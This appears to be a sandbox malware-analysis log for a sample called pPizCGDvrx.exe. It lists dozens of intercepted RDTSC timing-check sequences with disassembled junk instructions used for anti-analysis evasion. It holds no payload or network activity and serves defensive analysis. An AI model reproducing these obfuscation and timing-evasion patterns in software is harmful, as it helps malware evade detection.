                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102C4 second address: 51102CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102CA second address: 51102DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop ebx 0x0000000e mov dl, cl 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51102DB second address: 5110302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 8E0Bh 0x00000007 call 00007F2A2C619160h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov di, ax 0x00000018 movzx esi, bx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110302 second address: 511031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE367h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511031D second address: 511034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2A2C61915Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511037B second address: 511038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2A2CEBE35Dh 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 511038E second address: 5110394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110394 second address: 5110398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110398 second address: 511039C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130664 second address: 513066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513066B second address: 513069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A2C619167h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513069B second address: 5130713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F2A2CEBE35Bh 0x0000000c add al, 0000005Eh 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007F2A2CEBE362h 0x00000026 xor ecx, 16EFB688h 0x0000002c jmp 00007F2A2CEBE35Bh 0x00000031 popfd 0x00000032 popad 0x00000033 xchg eax, ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2A2CEBE365h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130713 second address: 5130719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130719 second address: 5130728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130728 second address: 513072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513072C second address: 5130747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130747 second address: 51307B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c mov cl, A9h 0x0000000e pop edi 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 jmp 00007F2A2C61915Eh 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F2A2C619161h 0x0000001e or cl, 00000076h 0x00000021 jmp 00007F2A2C619161h 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 call 00007F2A2C61915Eh 0x0000002e pop esi 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130830 second address: 5130834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130834 second address: 5130838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130838 second address: 513083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 513083E second address: 513085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2C61915Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51308A0 second address: 5130904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 call 00007F2A2CEBE35Bh 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pop esi 0x00000012 jmp 00007F2A2CEBE365h 0x00000017 leave 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ecx, edi 0x0000001d pushfd 0x0000001e jmp 00007F2A2CEBE35Fh 0x00000023 sub eax, 3508B15Eh 0x00000029 jmp 00007F2A2CEBE369h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130904 second address: 5130909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5130909 second address: 512005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 96h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F2A2CEBE352h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F2A2CEBE357h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F2A313EB94Bh 0x0000002a mov edi, edi 0x0000002c jmp 00007F2A2CEBE35Fh 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F2A2CEBE364h 0x00000039 and si, FF98h 0x0000003e jmp 00007F2A2CEBE35Bh 0x00000043 popfd 0x00000044 movzx esi, dx 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d mov edi, ecx 0x0000004f popad 0x00000050 mov ax, BC3Fh 0x00000054 popad 0x00000055 xchg eax, ebp 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F2A2CEBE361h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512005E second address: 51200A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619167h 0x00000009 jmp 00007F2A2C619163h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2A2C61915Bh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51200A1 second address: 51200D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2CEBE35Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51200D0 second address: 5120113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2A2C61915Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, esi 0x00000015 jmp 00007F2A2C619168h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120113 second address: 5120127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 4520h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120127 second address: 512012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512012B second address: 5120131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120131 second address: 512018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2A2C619164h 0x00000011 adc cl, FFFFFFC8h 0x00000014 jmp 00007F2A2C61915Bh 0x00000019 popfd 0x0000001a mov dx, ax 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F2A2C619165h 0x00000024 xchg eax, edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512018F second address: 51201A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51201DF second address: 512027B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 sbb si, FB48h 0x0000000e jmp 00007F2A2C61915Bh 0x00000013 popfd 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub edi, edi 0x0000001b pushad 0x0000001c mov si, bx 0x0000001f pushfd 0x00000020 jmp 00007F2A2C61915Dh 0x00000025 adc al, 00000066h 0x00000028 jmp 00007F2A2C619161h 0x0000002d popfd 0x0000002e popad 0x0000002f inc ebx 0x00000030 jmp 00007F2A2C61915Eh 0x00000035 test al, al 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F2A2C61915Eh 0x0000003e xor esi, 5A37AB38h 0x00000044 jmp 00007F2A2C61915Bh 0x00000049 popfd 0x0000004a popad 0x0000004b je 00007F2A2C619331h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F2A2C61915Ch 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512027B second address: 512028A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120354 second address: 5120369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F2A2C61915Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120369 second address: 51203D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test eax, eax 0x00000008 pushad 0x00000009 mov esi, ebx 0x0000000b mov ecx, ebx 0x0000000d popad 0x0000000e jg 00007F2A9D7FC46Bh 0x00000014 pushad 0x00000015 mov ebx, 359F6EAAh 0x0000001a call 00007F2A2CEBE35Bh 0x0000001f pushfd 0x00000020 jmp 00007F2A2CEBE368h 0x00000025 sbb ecx, 4ADDB898h 0x0000002b jmp 00007F2A2CEBE35Bh 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 js 00007F2A2CEBE3DBh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2A2CEBE362h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51203D5 second address: 51203E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2C61915Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51203E7 second address: 512040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 512040F second address: 5120415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120415 second address: 5120469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, E8h 0x00000005 mov bl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F2A9D7FC3D2h 0x00000010 pushad 0x00000011 mov cx, F193h 0x00000015 call 00007F2A2CEBE368h 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebx, dword ptr [ebp+08h] 0x00000021 jmp 00007F2A2CEBE367h 0x00000026 lea eax, dword ptr [ebp-2Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120469 second address: 5120484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C619167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120484 second address: 51204CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F2A2CEBE35Ch 0x00000010 mov dl, ah 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 mov ch, 95h 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007F2A2CEBE35Eh 0x00000021 nop 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51204CE second address: 51204E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 movsx ebx, ax 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51204E2 second address: 51204FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51205C8 second address: 51205CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51205CE second address: 51205DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE35Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51205DF second address: 51205E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 51205E3 second address: 5110DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 mov si, di 0x00000014 popad 0x00000015 popad 0x00000016 je 00007F2A9D7FC3B2h 0x0000001c xor eax, eax 0x0000001e jmp 00007F2A2CE97A8Ah 0x00000023 pop esi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 leave 0x00000027 retn 0004h 0x0000002a nop 0x0000002b xor ebx, ebx 0x0000002d cmp eax, 00000000h 0x00000030 je 00007F2A2CEBE4B3h 0x00000036 call 00007F2A313DC5A6h 0x0000003b mov edi, edi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110DD0 second address: 5110DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, 55h 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110DD7 second address: 5110DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2A2CEBE35Ah 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110DF8 second address: 5110E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110E07 second address: 5110E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F2A2CEBE35Bh 0x0000000c sub ch, 0000002Eh 0x0000000f jmp 00007F2A2CEBE369h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, ecx 0x0000001e mov bl, cl 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110E42 second address: 5110E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110E47 second address: 5110E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2A2CEBE366h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110E6C second address: 5110ED4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2A2C619163h 0x00000008 adc ah, 0000004Eh 0x0000000b jmp 00007F2A2C619169h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jmp 00007F2A2C619160h 0x00000018 popad 0x00000019 xchg eax, ecx 0x0000001a jmp 00007F2A2C619160h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F2A2C61915Eh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110ED4 second address: 5110EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A2CEBE35Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110EE6 second address: 5110EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110EF5 second address: 5110EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5110EFB second address: 5110F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619161h 0x00000009 adc ecx, 4F1D84F6h 0x0000000f jmp 00007F2A2C619161h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F2A2C619160h 0x0000001b adc ax, 3618h 0x00000020 jmp 00007F2A2C61915Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov dword ptr [ebp-04h], 55534552h 0x00000030 pushad 0x00000031 mov al, 63h 0x00000033 push eax 0x00000034 push edx 0x00000035 mov cx, di 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120AEA second address: 5120B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2CEBE369h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F2A2CEBE35Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F2A2CEBE369h 0x00000020 and ax, 85A6h 0x00000025 jmp 00007F2A2CEBE361h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120B61 second address: 5120BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2A2C619167h 0x00000009 adc cx, B8DEh 0x0000000e jmp 00007F2A2C619169h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [75AB459Ch], 05h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F2A2C619169h 0x00000029 add al, FFFFFFC6h 0x0000002c jmp 00007F2A2C619161h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007F2A2C619160h 0x00000038 and cx, EA68h 0x0000003d jmp 00007F2A2C61915Bh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120BFC second address: 5120C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120C7D second address: 5120CAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2C61915Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2A2C619161h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120CAA second address: 5120D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A2CEBE364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F2A2CEBE361h 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a call 00007F2A2CEBE368h 0x0000001f mov ebx, eax 0x00000021 pop ecx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push ebx 0x00000026 pop esi 0x00000027 popad 0x00000028 popad 0x00000029 pop eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120D07 second address: 5120D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\pPizCGDvrx.exeRDTSC instruction interceptor: First address: 5120D0D second address: 5120D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
